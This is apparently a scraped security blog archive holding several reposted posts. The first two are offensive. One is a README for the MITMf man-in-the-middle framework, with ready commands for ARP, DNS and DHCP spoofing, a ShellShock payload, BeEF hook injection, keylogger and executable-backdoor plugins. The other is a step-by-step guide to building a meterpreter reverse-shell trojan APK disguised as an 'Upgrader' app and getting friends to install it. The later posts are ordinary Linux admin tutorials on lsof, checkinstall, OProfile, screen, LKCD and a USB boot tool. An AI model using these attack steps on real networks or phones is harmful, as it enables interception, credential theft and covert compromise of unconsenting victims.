Never Ending Security

It starts all here

Category Archives: Operating Systems

MITMf – Framework for Man-In-The-Middle attacks


Framework for Man-In-The-Middle attacks

Quick tutorials, examples and developer updates at:

This tool is based on sergio-proxy and is an attempt to revive and update the project.

Contact me at:

Before submitting issues, please read the relevant section in the wiki .


MITMf relies on a LOT of external libraries therefore it is highly recommended you use virtualenvs to install the framework, this avoids permission issues and conflicts with your system site packages (especially on Kali Linux).

Before starting the installation process:

  • On Arch Linux:
pacman -S python2-setuptools libnetfilter_queue libpcap libjpeg-turbo
  • On Debian and derivatives (e.g Ubuntu, Kali Linux etc…)
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev

Installing MITMf

Note: if you’re rocking Arch Linux: you’re awesome! Just remember to use pip2 instead of pip outside of the virtualenv

  • Install virtualenvwrapper:
pip install virtualenvwrapper
  • Edit your .bashrc or .zshrc file to source the script:
source /usr/bin/

The location of this script may vary depending on your Linux distro

  • Restart your terminal or run:
source /usr/bin/
  • Create your virtualenv:
mkvirtualenv MITMf -p /usr/bin/python2.7
  • Clone the MITMf repository:
git clone
  • cd into the directory, initialize and clone the repos submodules:
cd MITMf && git submodule init && git submodule update --recursive
  • Install the dependencies:
pip install -r requirements.txt
  • You’re ready to rock!
python --help


MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.

Originally built to address the significant shortcomings of other tools (e.g Ettercap, Mallory), it’s been almost completely re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.


  • The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins, it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
  • As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better), allowing users to modify any type of traffic or protocol.
  • The configuration file can be edited on-the-fly while MITMf is running, the changes will be passed down through the framework: this allows you to tweak settings of plugins and servers while performing an attack.
  • MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using Net-Creds, which is run on startup.
  • Responder integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.

Active packet filtering/modification

You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!)

For example, here’s a stupid little filter that just changes the destination IP address of ICMP packets:

if packet.haslayer(ICMP):'Got an ICMP packet!')
    packet.dst = ''
  • Use the packet variable to access the packet in a Scapy compatible format
  • Use the data variable to access the raw packet data

Now to use the filter all we need to do is: python -F ~/

You will probably want to combine that with the Spoof plugin to actually intercept packets from someone else ;)

Note: you can modify filters on-the-fly without restarting MITMf!


The most basic usage, starts the HTTP proxy SMB,DNS,HTTP servers and Net-Creds on interface enp3s0:

python -i enp3s0

ARP poison the whole subnet with the gateway at using the Spoof plugin:

python -i enp3s0 --spoof --arp --gateway

Same as above + a WPAD rogue proxy server using the Responder plugin:

python -i enp3s0 --spoof --arp --gateway --responder --wpad

ARP poison and with the gateway at

python -i enp3s0 --spoof --arp --target, --gateway

Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):

python -i enp3s0 --spoof --dns --arp --target --gateway

Enable LLMNR/NBTNS/MDNS spoofing:

python -i enp3s0 --responder --wredir --nbtns

Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):

python -i enp3s0 --spoof --dhcp

Same as above with a ShellShock payload that will be executed if any client is vulnerable:

python -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'

Inject an HTML IFrame using the Inject plugin:

python -i enp3s0 --inject --html-url

Inject a JS script:

python -i enp3s0 --inject --js-url http://beef:3000/hook.js

And much much more!

Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)

For a complete list of available options, just run python --help

Currently available plugins

  • HTA Drive-By : Injects a fake update notification and prompts clients to download an HTA application
  • SMBTrap : Exploits the ‘SMB Trap’ vulnerability on connected clients
  • ScreenShotter : Uses HTML5 Canvas to render an accurate screenshot of a clients browser
  • Responder : LLMNR, NBT-NS, WPAD and MDNS poisoner
  • SSLstrip+ : Partially bypass HSTS
  • Spoof : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
  • BeEFAutorun : Autoruns BeEF modules based on a client’s OS or browser type
  • AppCachePoison : Performs HTML5 App-Cache poisoning attacks
  • Ferret-NG : Transperently hijacks client sessions
  • BrowserProfiler : Attempts to enumerate all browser plugins of connected clients
  • FilePwn : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
  • Inject : Inject arbitrary content into HTML content
  • BrowserSniper : Performs drive-by attacks on clients with out-of-date browser plugins
  • JSkeylogger : Injects a Javascript keylogger into a client’s webpages
  • Replace : Replace arbitary content in HTML content
  • SMBAuth : Evoke SMB challenge-response authentication attempts
  • Upsidedownternet : Flips images 180 degrees

More information can be found on:

How To Remotely Hack Android using Kali Linux

This is a tutorial explaining how to hack android phones with Kali.
I can’t see any tutorials explaining this Hack/Exploit, so, I made one.
(Still ,you may already know about this)

Step 1: Fire-Up Kali:

  • Open a terminal, and make a Trojan .apk
  • You can do this by typing :
  • msfpayload android/meterpreter/reverse_tcp LHOST= R > /root/Upgrader.apk (replace LHOST with your own IP)
  • You can also hack android on WAN i.e. through Interet by using yourPublic/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section)

Step 2: Open Another Terminal:

  • Open another terminal until the file is being produced.
  • Load metasploit console, by typing : msfconsole

Step 3: Set-Up a Listener:

  • After it loads(it will take time), load the multi-handler exploit by typing :use exploit/multi/handler
  • Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
  • To set L host type : set LHOST (Even if you are hacking on WAN type your private/internal IP here not the public/external)

Step 4: Exploit!

  • At last type: exploit to start the listener.
  • Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.
  • Then send it using Uploading it to Dropbox or any sharing website (
  • Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)
  • Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
  • However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
  • And when he clicks Open…

Step 5: BOOM!

There comes the meterpreter prompt:

See Meterpreter commands here:

Mac Linux USB Loader

Mac Linux USB Loader

Tool allowing you to put a Linux distribution on a USB drive and make it bootable on Intel Macs using EFI.

Mac Linux USB Loader logo

General Information

This is the Mac Linux USB Loader, a tool allowing you to take an ISO of a Linux distribution and make it boot using EFI. It requires a single USB drive formatted as FAT with at least 2 GB free recommended. Mac Linux USB Loader is available under the 3-clause BSD license.

The tool is necessary to make certain Linux distributions boot that do not have EFI booting support. Many distributions are adding this with the release of Windows 8, but it has not been finalized and is still nonstandard by most distributions. Many common distributions are supported, like Ubuntu and Linux Mint.

If you wish to contribute to the code or fork the repository, please do so. All development currently takes place on the master branch, and this is where code should be submitted for pull requests. The legacybranch contains the code for pre-3.0 versions of Mac Linux USB Loader; it will not be maintained and is present for historical interest only.

I created this tool, if you care, for several reasons:

  • None of the other tools available (esp. unetbootin) feel native and operate as you would expect on the Mac platform.
  • None of the other methods of which I am aware have the ability to make the archives boot on Intel Macs.
  • It was personally a pain in the neck getting Linux distributions to boot via USB on Macs.

That being said, it does have a few shortcomings:

  • Linux fails to have graphics on some Macs (i.e Macbook Pros with nVidia graphics), which in some cases prevents boot, but this is not necessarily an issue with Mac Linux USB Loader as much as it is an issue with the video drivers that ship with most distributions. Luckily, with Enterprise, which has been included with Mac Linux USB Loader since 2.0, you can use persistence to install the necessary video drivers on distributions like Ubuntu, helping to alleviate the issue.

Building from Source

Requirements: Xcode 6, OS X 10.10 SDK. OS X 10.8+ required to run built app

  1. Clone from git: git clone
  2. Run pod install (requires Cocoapods).
  3. Open Mac Linux USB Loader.xcworkspace and do an archive build, or simply run and debug it with Xcode


  • Used some icons from KDE’s Oxygen. link
  • Special thanks to Leander Lismond for translating the application into Dutch!

More information can be found on:

Linux super-duper admin tools: lsof

lsof is one of the more important tools you can use on your Linux box. Its name is somewhat misleading. lsof stands for lisopen files, but the term files fails to impact the true significance of power. That is, unless you remember the fundamental lesson, in Linux everything is a file.

We have had several super-duper admin articles, focusing around tools that help us understand better the behavior of our system, try to identify performance bottlenecks and solve issues that do not have an apparent, immediate presence in the logs. Save for vague, indirect symptoms, you might be struggling to understand what is happening under the hood.


lsof, alongside strace and OProfile, is another extremely versatile, powerful weapon in the arsenal of a system administrator and the curious engineer. Used correctly, it can yield a wealth of information about your machine, helping you narrow down the problem solving and maybe even expose the culprit.

So let’s see what this cool tool can do.

Why is lsof so important?

I did say lsof is important, but I did not say why. Well, the thing is, with lsof you can do pretty much anything. It encompasses the functionality of numerous other tools that you may be familiar with.

For example, lsof can provide the same information netstat offers. You can use lsof to find mounts on your machine, so it supplements both /etc/mtab and /proc/mounts. You can use lsof to learn what open files a processes holds. In general, pretty much anything you can find under the /proc filesystem, lsof can display in a very simple, centric manner, without writing custom scripts for looping through the sub-directories and parsing and filtering content.

lsof allows you to display information for particular users, processes, show only traffic for certain network protocols, file handles, and more. Used effectively, it’s the Swiss Knife of admin utilities.

lsof in action

A few demonstrations are in order.

Run without any parameters, lsof will display all of the information for all of the files. At this point, I should reiterate the fact there are many types of files. While most uses treat their music and Office documents as files, the generic description goes beyond that. Devices, sockets, pipes, and directories are also files.

lsof output explained

Before we dig in, let’s take a look at a basic output:

Basic usage

Command is the name of the process. It also includes kernel threads. PID is the process ID. USER is the owner of the process. FD is the first truly interesting field.

The FD stands for File Descriptor, an abstract indicator for accessing of files. File descriptors are indexes in kernel data structures called file descriptor tables, which contain details of all open files. Each process has its file descriptor table. User applications that wish to read and write to files will instead read to and write from file descriptors using system calls. The exact type of the file descriptor will determine what the read and write operations really mean.

In our example, we have several different values of FD listed. If you have ever looked under the /proc filesystem and examined the structure of a process, some of the entries will be familiar. For instance, cwdstands for Current Working Directory of the listed process. txt is the Text Segment or the Code Segment (CS), the bit of the object containing executable instructions, or program code if you will. mem stands for Data Segments and Shared Objects loaded into the memory. 10u refers to file descriptor 10, open for both reading and writing. rtd stands for root directory.

As you can see, you need to understand the output, but once you get the hang of it, it’s a blast. lsof provides a wealth of information, formatted for good looks, without too much effort. Now, it’s up to you to put the information to good use.

The fifth column, TYPE is directly linked to the FD column. It tells us what type of file we’re working with. DIR stands for directory. REG is a regular file or a page in memory. FIFO is a named pipe. Symbolic links, sockets and device files (block and character) are also file types. unknown means that the FD descriptor is of unknown type and locked. You will encounter these only with kernel threads.

For more details, please read the super-extensive man page.

Now, we’re already having a much better picture of what lsof tells us. For instance, 10u is a pipe used by initctl, a process control initialization utility that facilitates the startup of services during bootup. All in all, it may not mean anything at the moment, but if and when you have a problem, the information will prove useful.

The DEVICE column tells us what device we’re working on. The two numbers are called major and minor numbers. The list is well known and documented. For instance, major number 8 stands for SCSI block device. For comparison, IDE disks have a major number 3. The minor number indicates one of the 15 available partitions. Thus (8,1) tell us we’re working on sda1.

(0,16), the other interesting device listed refers to unnamed, non-device mounts.

For detailed list, please see:

SIZE/OFF is the file size. NODE is the Inode number. Name is the name of the file. Again, do not be confused. Everything is a file. Even your computer monitor, only it has a slightly different representation in the kernel.

Now, we know everything. OK, unfiltered output is too much to digest in one go. So let’s start using some flags for smart filtering of information.

Per process

To see all the open files a certain process holds, use -p:

lsof -p <pid>

lsof -p

Per user

Similarly, you can see files per user using the -u flag:

lsof -u <name>

lsof -u

File descriptors

You can see all the processes holding a certain fie descriptor with -d <number>:

lsof -d <number>

lsof -d 3

This is very important if you have hung NFS mounts or blocked processes in uninterruptible sleep (D state) refusing to go away. Your only way to start solving the problem is do dig into lsof and trace down the dependencies, hopefully finding processes and files that can be killed and closed. Alternatively, you can also display all the open file descriptors:

Rising number

Notice that the number is rising in sequence. In general, Linux kernel will give the first available file descriptor to a process asking for one. The convention calls for file descriptors 0, 1 and 2 to be standard input (STDIN), standard output (STDOUT) and standard error (STDERR), so normally, file descriptor allocation will start from 3.

If you’ve ever wondered what we were doing when we devnull-ed both the standard output and the standard error in the strace examples, this ought to explain it. We had the following:

something > /dev/null 2>&1

In other words, we redirected standard output to /dev/null, and then we redirected file descriptor 2 to 1, which means standard error goes to standard output, which itself is redirected to the system black hole.

Finding file descriptors can be quite useful, especially if some applications are hard-coding their use, which can lead to problems and conflicts. But that’s a different story altogether.

One more thing notable from the above screenshot are the unix and CHR FD types, which we have not yet seen. unix stands for UNIX domain socket, an interprocess communication socket, similar to Internet sockets, only without using a network protocol. CHR stands for a character device. Character devices allow the transmission of a single bit of data; typical examples are terminals, keyboard, mouse, and similar peripherals, where the order of data is critical.

Do not confuse domain sockets with classic sockets, which is an end-point consisting of an IP address and a port.

Netstat-like behavior

lsof can also provide lots of information similar and identical to netstat. You can dump the listing of all files and then grep for relevant information, like LISTEN, ESTABLISHED, IPV4, or any other network related term.


Internet protocols & ports

Specifically, lsof can also show you the open ports for either IPv4 or IPv6 protocols, much like nmap scan against the localhost:

lsof -i<protocol>

lsof -i

Directory search

lsof also supports a number of flags that are enabled with + and disabled with – signs, rather than the typical use of single or double dash (-) characters as option separators.

One of these is +d (and +D), which lets you show all the processes holding a certain directory. The capital D also lets you recurse and expands all the files in the directory and its sub-directories, whereas lower d will just show the directories and no files.

lsof +d <dir name> or lsof +D <dirname>

Dir search

Practical example

I’ve given you two juicy examples when I wrote the strace tutorial. I skimped a bit with OProfile, because finding simple and relevant problems that can be quickly demonstrated with a profiler tool are not easy to come by – but do not despair, there shall be an article.

Now, lsof allows a plenty of demo space. So here’s one.

How do you handle a stuck mount?

Let’s say you have a mount that refuses to go down. And you don’t really know what’s wrong. For some reason, it won’t let you unmount it.



You tried the umount command, but it does not really work:


Luckily for you, openSUSE recommends using lsof, but let’s ignore that for a moment.

Anyhow, your mount won’t come down. In desperation and against better judgment, you also try forcing the unmounting of the mount point with -f flag, but it still does not help. Not only the mount is refusing to let go, you may have also corrupted the /etc/mtab file by issuing the force mount command. Just some food for thought.

Now, how do you handle this?

The hard way

If you’re experienced and know your way about /proc, then you can do the following:

Under /proc, examine the current working directories and file descriptors holding the mount point. Then, examine the process table and see what the offending processes are and if they can be killed.

ls -l /proc/*/cwd | grep just



ls -l /proc/*/fd | grep just


Finally, in our example:

ps -ef | grep -E ‘10878|10910’


And problem solved …

Note: sometimes, especially if you have problems with mounts or stuck processes, lsof may not be the best tool, as it too may get stuck trying to recurse. In these delicate cases, you may want to use the -n and -l flags. -n inhibits the conversion of network IP addresses to domain names, making lsof work faster and avoids lockups due to name lookup not working properly. -l inhibits conversion of user IDs to names, quite useful if name lookup is working slowly or improperly, including problems with nscd daemon, connectivity to NIS, LDAP or whatever, and other issues. However, sometimes, in extreme cases, going for /proc may be the most sensible option.

The easy (and proper) way

By the book, using lsof ought to do it:

lsof | grep just

lsof just

And problem solved. Well, we still need to free the mount by closing or killing the process and the files held under the mount point, but we know what to do. Not only do we get all the information we need, we do this quickly, efficiently.

Knowing the alternative methods is great, but you should always start smart and simple, with lsof, exploring, narrowing down possibilities and converging on the root cause.

I hope you liked it.


There you go,a wealth of information about lsof and what it can do for you. I bet you won’t easily find detailed explanation about lsof output elsewhere, although examples about the actual usage are aplenty. Well, my tutorial provides you with both.

Now, the big stuff is ahead of you. Using lsof to troubleshoot serious system problems, without wasting time going through /proc and trying to find relevant system information, when it’s all there, hidden under just one mighty command.

checkinstall – Smartly manage your installations

The best way to install applications in Linux is by using the package managers. It’s the simplest, safest and most foolproof way of obtaining and maintaining the programs you need. You install them using a friendly and intuitive interface and you uninstall them using the same interface. The dependencies are automatically solved. The program revision is tracked. Whenever you can, use the package manager to get what you need.

There are many package managers available – and they come in two forms: the core utility, which is command-line and the front-end (GUI), which calls on the command-line tool to do the job. In openSUSE, you have the YaST/zypper combo, in Ubuntu, you have Synaptic/apt, in Fedora, you have Pirut/yum, and so forth.


But sometimes, the program you want will not be found in the repositories, even the extras ones like Medibuntu or RPMForge. You will have to download the sources and compile them and install your package manually.

The problem with this approach is that your manually installed programs will not be visible in your package manager. They won’t show up, nor be available for upgrades or removal, creating a potential clutter/security issue for you, especially if there are many such programs you must use.

Luckily for you, there’s a solution: a utility that can package the sources into installer files that your package manager will recognize and be able to catalog. This utility is called checkinstall.

Enter checkinstall

checkinstall works by functioning as a wrapper for your typical installation from sources. It will follow after the third stage in the configure, make, make install chain and keep track of every change made to the system. Once the installation is done, it will create a package compatible with your package management. checkinstall works with RPM, Debian and Slackware packages, covering a rather large install base.

OK, let’s see this thing in action!

Install checkinstall

The first thing is: install checkinstall. A sort of a chicken and an egg problem. You should probably use your package manager to get checkinstall installed.


Install program from source

Your next step is to find the application you want to install, which is not found in the repositories. This is not an east task nowadays. I spent quite a bit of time hunting for a program that I want. Eventually, I settled forGuake, a Quake-like drop-down terminal utility. Please note that it DOES exist in the repositories, but it was a good choice as any.

So I started the usual chain, with configure and make …



Please note that these two steps may fail, depending on the configuration of your system. Some of your libraries may be missing, outdated or too new for the sources you’re trying to compile. Then, the sources themselves might be written badly, with errors and whatnot.

But assuming that everything went smoothly, your next step is to invoke checkinstall as root (or sudo):


Run checkinstall

A short wizard will guide you through the installation & package creation process. If the package documentation directory does not exist, it will ask you to create one.

You will then have the opportunity to write your own documentation:


Then comes the installation and the creation of the package. You can change the options if you like. Normally, I would not recommend changing any of the values unless you really know what you’re doing.

Debian package

And soon, you will have the program installed:


You can even check in your package manager now, to see whether the package is listed and installed as expected. Yup, there it is! Notice our very own documentation!

In package manager

And the application in the menu:


From now on, the manually installed program is just like any other program. Your package manager will maintain it, sparing you the grueling manual work. Excellent!


checkinstall is a great addition to the Linux user’s arsenal of handy tools, especially experienced users with peculiar taste for non-conventional installations of programs not readily available in the repositories. It allows you to easily keep track and order of all your applications, whether they come as package installers or from sources.

Linux super-duper admin tools: OProfile

It’s time to step up the geeky fun a notch and learn about OProfile.


OProfile is a Linux system-wide profiling tool that you can use to, uh, profile and analyze performance and runtime problems with your applications, or even the kernel itself. It’s very simple to use and does not require any special preparations. No need to patch the kernel or use debug symbols. Just insert the module and start running.

OProfile uses the hardware performance counters of the CPU to enable profiling of a wide variety of statistics, which you can then use for profiling of the kernel and your applications. In fact, OProfile works with everything, including hardware and software interrupt handlers, kernel modules, the kernel, shared libraries, and applications.

After you’ve collected the data you need, you can run reports against it, even produce graphs showing you a vizualization of the profiled runs.

For more details, please read the Novell Cool Solutions OProfile article and visit the official website, where you can find lots of useful information about the tool, including its numerous features and advantages.

Now, let’s use it.


I must warn you though. Officially, OProfile is alpha software. Although it has been tested to work well with a wide range of architecture platforms and kernels, there’s no guarantee it will do what’s expected of it. You may even break your system.

My experience shows no issues with OProfile, but you may not be so lucky. Now, if you’re brave enough, proceed.

Regardless, using OProfile is a very geeky thing that will surely impress everyone and may even provide you with yet another powerful tool for making your environment smarter, faster and safer. Home users will probably never need it, but they just might be piqued enough to give it a try, especially if they’re facing severe performance problems. System admin wise, OProfile probably falls into the Level II-III support, so you won’t be using it that often, but when you do, it should come quite handy.

Install OProfile

The tool comes available in the repositories of many distributions, so you will not have to manually download and compile. If you do, consider using checkinstall to have it registered in your software database.


Running OProfile

Now, we need to start using the tool.

The first question you need to ask yourselves is: do you also want to profile the kernel? Your answer will determine the OProfile command line.

If you wish to run OProfile without profiling the kernel, then:

opcontrol –no-vmlinux

If you do want to profile the kernel, as well, then:

opcontrol –vmlinux=/boot/vmlinux-`uname -r`


The above command will set the Linux kernel to the running version of your kernel in uncompressed form. To make sure such a kernel exists, please take a look under your /boot directory.

Modern Linux distributions ship with the kernel archived (zipped) to conserve space, so you will have to unzip it before it can be used:

Boot dir

So we do have the kernel available, it’s vmlinux-<whatever>.gz. We need to unzip it. This is done with the gunzip command:

gunzip vmlinux-<something>.gz

Like this:


Now, if needed, rerun the opcontrol command from before to set the kernel. Once you’ve done this, launch the tool. It will start collecting the data.


Let it run for a while before stopping it and profiling the data. In fact, to make things meaningful, we’ll run a little compilation in the background, so that our report contains more data, as well as more meaningful data. A good example is the MPlayer.


After a while you can simply dump the collected data and continue profiling or stop the profiler altogether. To just dump the data, use:

opcontrol –dump

To stop it, use:

opcontrol –stop


If, at any given moment you wish to resrt your profiling counters and start fresh, then you can reset the OProfile deamon:

opcontrol –reset

And to shut it down altogether:

opcontrol –shutdown


Once you’ve collected enough data, time for a report. Just run:


To get what you need. This is where the real fun begins, analyzing the report and trying to understand the problems you’re facing.

Anyhow, here’s a sample of what it may look like. Screenshot taken on another host, so please don’t mind the differences in host names and CPU speeds and such.


More data

In the leftmost column, you will get the exact number of samples collected. In the middle one, the percentage of time spent using different libraries. In the rightmost column, the actual process name. Usually, you will see a whole bunch of glibc, perl and other libraries. If you’re compiling a tool that also uses GUI, then other interesting bits, too.

Since I was also listening to Youtube in Firefox while compiling and doing a few more things, you will notice calls to Nvidia driver, Flash player and so forth.

Now, opreport may not report everything you want and it may even exit with an error. Sometimes, the amount of time spent profiling may not be enough to produce a meaningful report. At other times, you may need packages with debug symbols or even a complete debug kernel.

In that case, you will want to run opcontrol –symbols or opcontrol -l to get more data.


And you may even want to create a call graph. This is done by running opcontrol -c.

Call graph

You will need a tool that can read and display call graphs. There are many, many options available. For example, an oldie but goodie Kpl comes to mind:


You may also want to use KCachegrind, but this one requires the call graphs to be in the Valgrind format, which will require a conversion tool. This is where the real hacking kicks in, but this is beyond the scope of this article. We’ll talk about advanced system debugging in following articles. Consider strace and OProfile a sort of a long and expensive warmup.


OProfile is a very handy, useful tool. In the hands of a smart system administrator, it can be used to detect application slowness problems, analyze system bottlenecks, optimize system performance and utilization, and resolve resource/usage conflicts. Combined with a range of other admin programs, some of which we’ve talked about and others we are yet to see, OProfile is a must-have item on the system debugging checklist.

I hope you’ve enjoyed this article. Many more are yet to come, exposing you to the realm of uber-hack. As to profiling itself, we’ll talk about some other cool programs, including Valgrind and Linux Trace Toolkit (LTT).

Linux super-duper admin tools: screen

Time to learn about yet another cool little admin application that will change the way you think and work. We had strace, a mighty, versatile debugging tool that helped us diagnose and categorize system programs quickly and effectively and point us in the right direction in our investigation of problems. We had OProfile, a powerful profiling utility that can be used to time the system and application performance and identify chokepoints and bottlenecks in program executions. Time to step back and appraise screen.



screen is a full-screen window manager that multiplexes a physical terminal between several processes, typically interactive shells. Each virtual terminal provides the functions of the legendary DEC VT100 terminal.

Additionally, the utility has insert/delete line, support for multiple character sets, a scrollback history buffer for each virtual terminal, and a copy-and-paste mechanism that allows moving text regions between windows.

When screen is called, it creates a single window with a shell in it and then gets out of your way so that you can use the program as you normally would. Then, at any time, you can create new full-screen windows with other programs in them, including more shells, kill existing windows, view a list of windows, turn output logging on and off, copy & paste text between windows, view the scrollback history, switch between windows in whatever manner you wish, etc.

All windows run their programs completely independent of each other. Programs continue to run when their window is currently invisible and even when the whole screen session is detached from the user’s terminal. When a program terminates, screen kills the window that contained it. If this window was in the foreground, the display switches to the previous window; if none are left, screen exits.

In a nutshell, if Ctrl + F buttons allow you to switch between up to seven virtual consoles, horizontally, screen lets you create an infinite vertical stack of consoles in each one of these.

Home users running full GUI desktops and playing with tabbed terminal utilities would be hard-tempted to find merit in screen, but when you’re running in runlevel 3 and the monitor space is limited, screen is a blessing.

Screen in action

Let’s begin with a few screenshots. To start screen, just type screen in any one console windows, be it gnome-terminal, xterm, Konsole, or any other.


This will display an introduction messages. Press Enter to exit.


You’re inside a new virtual console. Why not fire another?


And here’s the second:


Using the right keyboard shortcuts, we can switch between them, back and forth. Use Ctrl + a then 0 to go to the zeroth (first) screen, Ctrl + a then 1 to go to the second one, and so forth.

First toggled

Now, demonstrating screen with still images is difficult, so here’s a Flash movie! Created using Wink, which served us well so many times, including the tutorial itself, as well as the Windows PowerShell article, and a few others.

So here we go:

Lovely, right! Damn right!

Help window

Don’t hesitate to call for help. Ctrl + a, then ? will pop the help screen.


Of course, you can also read the man page for more details. There’s a plenty you can do with screen, attach/detach/reattach sessions, specify the history scrollback buffer, turn login mode on and off, suppress error messages, and more. screen is a powerful marvel and you should start using it.


Yet another powerful tool mastered. Our list grows bigger, and so does our knowledge. screen may seem trivial to you, but what if you need to debug problems across multiple session and you can’t afford to have tons of Konsole or xterm windows strewn about the desktop like mad. Then, there’s the issue of practical visibility. Never take your eyes off the screen and yet enjoy full multi-view console.

I hope you liked this little surprise. Now, off to new wonders. Stay tuned for many more articles of great admin tools, aptly called super-duper, by me. Be excellent to each other and party on.

Collecting And Analyzing Linux Kernel Crashes – LKCD

Table of Contents

  1. LKCD – Introduction
    1. How does LKCD work?
  2. LKCD Installation
  3. Basic prerequisites
    1. A Linux operating system configured to use LKCD:
    2. LKCD configuration
  4. LKCD local dump procedure
    1. Required packages
    2. Configuration file
    3. Activate dump process (DUMP_ACTIVE)
    4. Configure the dump device (DUMP_DEVICE)
    5. Configure the dump directory (DUMPDIR)
    6. Configure the dump level (DUMP_LEVEL)
    7. Configure the dump flags (DUMP_FLAGS)
    8. Configure the dump compression level (DUMP_COMPRESS)
    9. Additional settings
    10. Enable core dump capturing
    11. Configure LKCD dump utility to run on startup
  5. LKCD netdump procedure
  6. Configure LKCD netdump server
    1. Required packages
    2. Configuration file
    3. Configure the dump flags (DUMP_FLAGS)
    4. Configure the source port (SOURCE_PORT)
    5. Make sure dump directory is writable for the netdump user
    6. Configure LKCD netdump server to run on startup
    7. Start the server
  7. Configure LKCD client for netdump
    1. Configure the dump device (DUMP_DEV)
    2. Configure the target host IP address (TARGET_HOST)
    3. Configure target host MAC address (ETH_ADDRESS)
    4. Configure target host port (TARGET_PORT)
    5. Configure the source port (SOURCE_PORT)
    6. Enable core dump capturing
    7. Configure LKCD dump utility to run on startup
    8. Start the lkcd-netdump utility
  8. Test functionality
    1. Example of unsuccessful netdump to different network segment
  9. Conclusion
  10. Download

LKCD – Introduction

LKCD stands for Linux Kernel Crash Dump. This tool allows the Linux system to write the contents of its memory when a crash occurs, so that they can be later analyzed for the root cause of the crash.

Ideally, kernels never crash. In reality, the crashes sometimes occur, for whatever reason. It is in the best interest of people using the plagued machines to be able to recover from the problem as quickly as possible while collecting as much data available. The most relevant piece of information for system administrators is the memory dump, taken at the moment of the kernel crash.

How does LKCD work?

You won’t notice LKCD in your daily work. Only when a kernel crash occurs will LKCD kick into action. The kernel crash may result from a kernel panic or an oops or it may be user-triggered. Whatever the case, this is when LKCD begins working, provided it has been configured correctly.

LKCD works in two stages:

Stage 1

This is the stage when the kernel crashes. Or more correctly, a crash is requested, either due to a panic, an oops or a user-triggered dump. When this happens, LKCD kicks into action, provided it has been enabled during the boot sequence.

LKCD copies the contents of the memory to a temporary storage device, called the dump device, which is usually a swap partition, but it may also be a dedicated crash dump collection partition.

After this stage is completed, the system is rebooted.

Stage 2

Once the system boots back online, LKCD is initiated. On different systems, this takes a different startup script. For instance, on a RedHat machine, LKCD is run by the /etc/rc.sysinit script.

Next, LKCD runs two commands. The first command is lkcd config, which we will review more intimately later. This commands prepares the system for the next crash. The second command is lkcd save, which copies the crash dump data from its temporary storage on the dump device to the permanent storage directory, called dump directory.

Along with the dump core, an analysis file and a map file are created and copied; we’ll talk about these separately when we review the crash analysis.

A completion of this two-stage cycle signifies a successful LKCD crash dump.

Here’s an illustration:


Some reservations:

LKCD is a somewhat old utility. It may not work well with newer kernels.

All right, now that we know what we’re talking about, let us setup and configure LKCD.

LKCD Installation

You will have to forgive me, but I will NOT demonstrate the LKCD installation. There are several reasons for this untactical evasion on my behalf. I do not expect you to forgive me, but I do hope you will listen to my points:

The LKCD installation requires kernel compilation. This is a lengthy and complex procedure that takes quite a bit of time. It is impossible to explain how LKCD can be installed without showing the entire kernel compilation in detail. For now, I will have to skip this step, but I promise you a tutorial on kernel compilation.

Furthermore, the official LKCD documentation does cover this step. In fact, the supplied IBM tutorial is rather good. However, like most advanced technical papers geared toward highly experienced system administrators, it lacks actual usage examples.

Therefore, I will assume you have a working system compiled with LKCD. So the big question is, what now? How do you use this thing?

This tutorial will try to answer the questions in a linear fashion, explaining how to configure LKCD for local and network dumping of the memory core.

Basic prerequisites

A Linux operating system configured to use LKCD:

Most home users will probably not be able to meet this demand. On the other hand, when you think about it, the collection and analysis of kernel crashes is something you will rarely do at home. For home users, kernel crashes, if they ever occur within the limited scope of desktop usage, are just an occasional nuisance, the open-source world equivalent of the BSOD.

However, if you’re running a business, having your mission-critical systems go down can have a negative business impact. This means that you should be running the “right” kind of operating system in your work environment, configured to suit your needs.

LKCD configuration

LKCD dumps the system memory to a device. This device can be a local partition or a network server. We will discuss both options.

LKCD local dump procedure

Required packages

The host must have the lkcdutils package installed.

Configuration file

The LKCD configuration is located under /etc/sysconfig/dump. Back this up before making any changes! We will have to make several adjustments to this file before we can use LKCD. So let us begin.

Activate dump process (DUMP_ACTIVE)

To be able to use LKCD when crashes occur, you must activate it.


Configure the dump device (DUMP_DEVICE)

You should be very careful when configuring this directive. If you choose the wrong device, its contents will be overwritten when a crash is saved to it, causing data loss.

Therefore, you must make sure that the DUMPDEV is linked to the correct dump device. In most cases, this will be a swap partition, although you can use any block device whose contents you can afford to overwrite. Accidentally, this section partially explains why the somewhat nebulous and historic requirement for a swap partition to be 1.5x the size of RAM.

What you need to do is define a DUMPDEV device and then link it to a physical block device; for example,/dev/sdb1. Let’s use the LKCD default, which calls the DUMPDEV directive to be set to /dev/vmdump.


Now, please check that /dev/vmdump points to the right physical device. Example:

ls -l /dev/vmdump
lrwxrwxrwx 1 root root 5 Nov 6 21:53 /dev/vmdump ->/dev/sda5

